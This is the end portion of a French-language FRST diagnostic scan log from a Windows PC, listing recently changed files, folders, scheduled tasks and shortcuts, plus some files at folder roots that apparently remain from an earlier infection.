C:\Windows\Registration 2023-03-31 16:21 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2023-03-31 16:20 - 2021-08-20 14:26 - 000000000 ____D C:\Users\Hdupo 2023-03-31 16:20 - 2019-12-07 11:03 - 000524288 _____ C:\Windows\system32\config\BBI 2023-03-31 16:19 - 2023-01-19 13:57 - 000000000 ____D C:\Users\Hdupo\AppData\LocalLow\Temp 2023-03-31 16:18 - 2019-12-07 11:14 - 000000000 ___HD C:\Windows\system32\GroupPolicy 2023-03-31 16:18 - 2019-12-07 11:03 - 000000000 ____D C:\Windows\CbsTemp 2023-03-31 16:11 - 2021-08-20 14:30 - 000005810 _____ C:\Windows\system32\PerfStringBackup.INI 2023-03-31 16:11 - 
2019-12-07 16:49 - 004741736 _____ C:\Windows\system32\perfh00C.dat 2023-03-31 16:11 - 2019-12-07 16:49 - 001341366 _____ C:\Windows\system32\perfc00C.dat 2023-03-31 16:04 - 2021-08-20 15:41 - 000000000 ____D C:\Windows\Minidump 2023-03-31 16:04 - 2021-08-20 14:22 - 000000000 ____D C:\Windows\system32\SleepStudy 2023-03-31 13:49 - 2023-02-03 18:42 - 000001464 _____ C:\Users\Hdupo\Desktop\NVIDIA GeForce NOW.lnk 2023-03-31 13:49 - 2023-01-08 19:05 - 000001472 _____ C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NVIDIA GeForce NOW.lnk 2023-03-31 13:49 - 2022-11-26 16:55 - 000000000 ____D C:\Users\Hdupo\AppData\Local\NVIDIA Corporation 2023-03-31 13:44 - 2021-09-03 10:10 - 000002205 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2023-03-31 13:44 - 2021-09-03 10:10 - 000002164 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2023-03-31 13:42 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\AppReadiness 2023-03-29 17:33 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps 2023-03-29 17:30 - 2021-08-20 15:35 - 000017424 _____ (MICSYS Technology Co., LTd) C:\Windows\system32\Drivers\MsIo64.sys 2023-03-29 17:29 - 2022-02-13 00:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2023-03-29 17:29 - 2021-12-12 17:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit 2023-03-29 17:29 - 2021-12-12 17:49 - 000000000 ____D C:\Program Files\Java 2023-03-29 17:29 - 2021-08-20 15:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIGABYTE 2023-03-29 17:29 - 2021-08-20 15:04 - 000000000 ____D C:\Users\Hdupo\AppData\Local\Downloaded Installations 2023-03-29 17:29 - 2021-08-20 15:04 - 000000000 ____D C:\Program Files (x86)\GIGABYTE 2023-03-29 16:34 - 2023-02-27 09:06 - 001873396 ____N C:\Windows\Minidump\032923-14546-01.dmp 2023-03-29 16:34 - 2021-08-20 15:00 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 
2023-03-29 16:31 - 2021-08-20 14:22 - 000000000 ____D C:\Windows\system32\Drivers\wd 2023-03-29 16:26 - 2022-04-25 11:43 - 000000000 ____D C:\Users\Hdupo\AppData\Local\CrashDumps 2023-03-29 16:25 - 2023-01-17 12:48 - 000002280 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2023-03-29 16:25 - 2021-08-20 14:22 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2023-03-26 13:50 - 2022-06-10 22:07 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\.tlauncher 2023-03-24 17:19 - 2021-12-12 19:42 - 000003588 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-274230415-3152524040-1578995417-1001 2023-03-24 17:19 - 2021-08-20 14:31 - 000003382 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-274230415-3152524040-1578995417-1001 2023-03-24 17:19 - 2021-08-20 14:26 - 000002417 _____ C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2023-03-23 18:49 - 2022-10-11 15:30 - 000002033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat.lnk 2023-03-23 18:49 - 2022-10-11 15:30 - 000002021 _____ C:\Users\Public\Desktop\Adobe Acrobat.lnk 2023-03-23 18:49 - 2021-08-20 19:42 - 000004562 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task 2023-03-22 17:31 - 2021-10-16 17:52 - 000000000 ____D C:\Windows\system32\Tasks\Mozilla 2023-03-22 17:31 - 2021-08-20 15:00 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2023-03-21 18:40 - 2023-01-31 12:46 - 000000760 _____ C:\Windows\Tasks\CCleanerCrashReporting.job 2023-03-20 18:40 - 2023-02-03 22:18 - 000003474 _____ C:\Windows\system32\Tasks\CCleanerCrashReporting 2023-03-20 18:40 - 2021-09-03 17:39 - 000003936 _____ C:\Windows\system32\Tasks\CCleaner Update 2023-03-19 23:02 - 2022-12-08 15:53 - 000001244 _____ C:\Users\Hdupo\Desktop\Roblox Studio.lnk 2023-03-19 23:02 - 2021-10-17 20:27 - 000001421 _____ C:\Users\Hdupo\Desktop\Roblox Player.lnk 2023-03-19 23:02 - 2021-10-17 20:25 
- 000000000 ____D C:\Users\Hdupo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox 2023-03-19 16:51 - 2022-06-10 22:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TLauncher 2023-03-19 16:45 - 2022-06-10 22:07 - 000001949 _____ C:\Users\Hdupo\Desktop\TLauncher.lnk 2023-03-19 16:40 - 2019-12-07 11:13 - 000000000 ____D C:\Windows\INF 2023-03-19 16:24 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\winevt 2023-03-19 16:14 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\oobe 2023-03-19 11:28 - 2022-12-24 14:47 - 000000000 ____D C:\Users\Hdupo\Desktop\photo stage 2023-03-19 11:16 - 2021-11-21 21:55 - 000000000 ____D C:\found.000 2023-03-18 21:11 - 2022-10-20 19:15 - 000079352 _____ (Microsoft Corporation) C:\Windows\system32\xgamehelper.exe 2023-03-18 21:11 - 2022-10-20 19:15 - 000062928 _____ (Microsoft Corporation) C:\Windows\system32\xgamecontrol.exe 2023-03-18 21:11 - 2022-03-25 17:45 - 002786768 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000476624 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000243200 _____ (Microsoft Corporation) C:\Windows\system32\gamingservicesproxy.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000202192 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000165328 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll 2023-03-18 21:11 - 2022-03-25 17:45 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll 2023-03-18 21:06 - 2021-08-20 14:22 - 000003690 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2023-03-18 21:06 - 2021-08-20 14:22 - 000003566 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2023-03-18 17:01 - 2022-11-26 14:50 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job 2023-03-15 14:12 - 
2021-08-20 14:37 - 000000000 ____D C:\Windows\system32\MRT 2023-03-15 14:10 - 2021-08-20 14:37 - 153620824 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2023-03-07 23:00 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel 2023-03-04 19:37 - 2021-10-29 17:10 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\TS3Client 2023-03-02 20:10 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\LiveKernelReports 2023-03-01 22:20 - 2021-10-17 20:25 - 000000252 _____ C:\Users\Hdupo\AppData\LocalLow\rbxcsettings.rbx ==================== Fichiers à la racine de certains dossiers ======== 2022-02-08 19:56 - 2022-02-08 19:56 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll 2022-02-08 19:56 - 2022-02-08 19:56 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll 2022-02-08 19:56 - 2022-02-08 19:56 - 000214016 _____ () C:\ProgramData\msvcp140.dll 2022-02-08 19:59 - 2022-02-08 20:00 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll 2022-02-08 20:00 - 2022-02-08 20:00 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll 2022-02-08 20:00 - 2022-02-08 20:00 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll 2023-03-19 20:21 - 2023-03-24 14:54 - 000000015 _____ () C:\Users\Hdupo\AppData\Roaming\obs-virtualcam.txt 2022-02-08 20:00 - 2022-02-08 20:00 - 000000564 _____ () C:\Users\Hdupo\AppData\Local\bowsakkdestx.txt 2022-01-20 13:42 - 2022-01-20 13:42 - 000016438 _____ () C:\Users\Hdupo\AppData\Local\partner.bmp 2022-04-12 18:56 - 2022-11-26 12:41 - 000007601 _____ () C:\Users\Hdupo\AppData\Local\Resmon.ResmonCfg ==================== SigCheck ============================ (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) ==================== Fin de FRST.txt ========================